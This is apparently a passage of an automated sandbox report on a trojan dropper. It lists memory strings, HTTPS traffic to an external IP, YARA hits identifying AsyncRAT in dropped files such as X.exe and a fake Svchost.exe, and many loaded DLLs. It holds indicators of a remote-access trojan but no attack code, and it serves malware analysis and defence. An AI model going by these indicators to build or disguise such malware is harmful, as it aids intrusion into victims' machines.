                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                      Source: svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                      Source: svchost.exe, 00000013.00000003.2802443282.000002A0E2757000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&amp;fid=cp
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802186677.000002A0E272C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802257228.000002A0E275A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                      Source: svchost.exe, 00000013.00000002.3876200065.000002A0E1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                      Source: svchost.exe, 00000013.00000002.3876200065.000002A0E1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3875203578.000002A0E1E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                      Source: svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srfrf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3875203578.000002A0E1E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3875203578.000002A0E1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                      Source: svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3875203578.000002A0E1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf%S
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3875203578.000002A0E1E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                      Source: svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srfe
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                      Source: svchost.exe, 00000013.00000002.3877050228.000002A0E1EE1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3878483640.000002A0E2E3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                      Source: svchost.exe, 00000013.00000002.3876200065.000002A0E1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfr
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                      Source: svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49784 version: TLS 1.2

                      System Summary

                      barindex
                      Source: 2.0.X.exe.960000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000002.00000000.1420642813.0000000000962000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\X.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\X.exeCode function: 2_2_00007FF8880D73522_2_00007FF8880D7352
                      Source: C:\Users\user\AppData\Roaming\X.exeCode function: 2_2_00007FF8880D65A62_2_00007FF8880D65A6
                      Source: C:\Users\user\AppData\Roaming\X.exeCode function: 2_2_00007FF8880D0E892_2_00007FF8880D0E89
                      Source: C:\Users\user\AppData\Roaming\X.exeCode function: 2_2_00007FF8880D17F52_2_00007FF8880D17F5
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 440 -p 3280 -ip 3280
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe, 00000000.00000000.1412513550.0000000000A2A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameR6 script.exe4 vs SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe, 00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameX.exe4 vs SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeBinary or memory string: OriginalFilenameR6 script.exe4 vs SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
